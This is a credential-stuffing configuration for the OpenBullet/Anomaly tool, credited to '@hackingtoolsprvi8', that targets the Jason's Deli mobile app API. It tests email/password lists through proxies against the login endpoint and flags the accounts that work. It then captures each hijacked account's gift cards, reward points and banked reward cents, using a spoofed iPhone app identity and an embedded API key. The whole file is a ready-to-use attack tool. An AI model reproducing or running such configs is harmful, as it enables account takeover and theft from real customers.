[SETTINGS]
{
  "Name": "Jason's Deli(@hackingtoolsprvi8)",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2022-06-29T08:05:30.1903732+02:00",
  "AdditionalInfo": "",
  "Author": "@hackingtoolsprvi8",
  "Version": "1.4.5 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://jdapi.jasonsdeli.com/app/v1/users/session" 
  CONTENT "{\"username\":\"<USER>\",\"password\":\"<PASS>\",\"rememberMe\":true}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: 64" 
  HEADER "Content-Type: application/json" 
  HEADER "Host: jdapi.jasonsdeli.com" 
  HEADER "User-Agent: Appcelerator Titanium/0.0.0 (iPhone/15.4.1; iOS; en_US;)" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "X-Titanium-Id: a080204e-b662-4493-98a8-b62c48ed0508" 
  HEADER "x-api-key: f39f1d90-2fb8-11e9-b8f3-4df5052581c4" 
  HEADER "x-app-version: 3.7.2" 
  HEADER "x-application-name: jd-mobile-app" 
  HEADER "x-auto-poll-request-supported: true" 
  HEADER "x-device-id: 90D4E9AD-5500-4025-9165-9DAE6800129D" 
  HEADER "x-os-name: iphone" 
  HEADER "x-os-version: 15.4.1" 
  HEADER "x-tz-offset: 180" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Login Failed" 
  KEYCHAIN Success OR 
    KEY "emailVerified" 

PARSE "<SOURCE>" LR "giftCards\":[" "],\"phoneNumbers\"" CreateEmpty=FALSE -> CAP "Gift Cards" 

REQUEST GET "https://jdapi.jasonsdeli.com/app/v1/rewards" 
  
  HEADER "Accept: application/json" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: 0" 
  HEADER "Content-Type: application/x-www-form-urlencoded; charset=utf-8" 
  HEADER "Host: jdapi.jasonsdeli.com" 
  HEADER "User-Agent: Appcelerator Titanium/0.0.0 (iPhone/15.4.1; iOS; en_US;)" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "X-Titanium-Id: a080204e-b662-4493-98a8-b62c48ed0508" 
  HEADER "x-api-key: f39f1d90-2fb8-11e9-b8f3-4df5052581c4" 
  HEADER "x-app-version: 3.7.2" 
  HEADER "x-application-name: jd-mobile-app" 
  HEADER "x-auto-poll-request-supported: true" 
  HEADER "x-device-id: 90D4E9AD-5500-4025-9165-9DAE6800129D" 
  HEADER "x-os-name: iphone" 
  HEADER "x-os-version: 15.4.1" 
  HEADER "x-tz-offset: 180" 

PARSE "<SOURCE>" JSON "currentPoints" CreateEmpty=FALSE -> CAP "Points" 

PARSE "<SOURCE>" JSON "bankedRewardsCents" CreateEmpty=FALSE -> CAP "Reward Cents" 

FUNCTION Constant "@hackingtoolsprvi8" -> VAR "Config By" 

